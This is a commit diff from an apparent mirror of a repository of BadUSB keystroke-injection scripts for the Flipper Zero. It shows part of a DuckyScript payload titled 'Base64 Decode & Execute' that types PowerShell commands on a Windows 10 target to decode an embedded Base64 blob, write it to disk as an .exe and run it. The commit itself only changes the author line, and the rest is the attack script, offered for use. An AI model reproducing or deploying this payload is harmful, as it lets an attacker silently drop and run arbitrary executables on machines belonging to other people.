mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-31 23:15:54 -08:00
Update Base64 Decode & Execute.txt
This commit is contained in:
@@ -1,5 +1,5 @@
|
||||
REM Title: Base64 Decode & Execute
|
||||
REM Author: @beigeworm
|
||||
REM Author: @beigeworm | https://github.com/beigeworm
|
||||
REM Description: Uses Powershell to decode a Base64 string and then execute the file.
|
||||
REM Target: Windows 10
|
||||
|
||||
@@ -27,4 +27,4 @@ STRING $decodedFile = [System.Convert]::FromBase64String($b64);
|
||||
REM *replace NAME_HERE and desired filetype (example is .exe)*
|
||||
STRING $File = "NAME_HERE"+".exe";
|
||||
|
||||
STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File
|
||||
STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File
|
||||
|
||||
Reference in New Issue
Block a user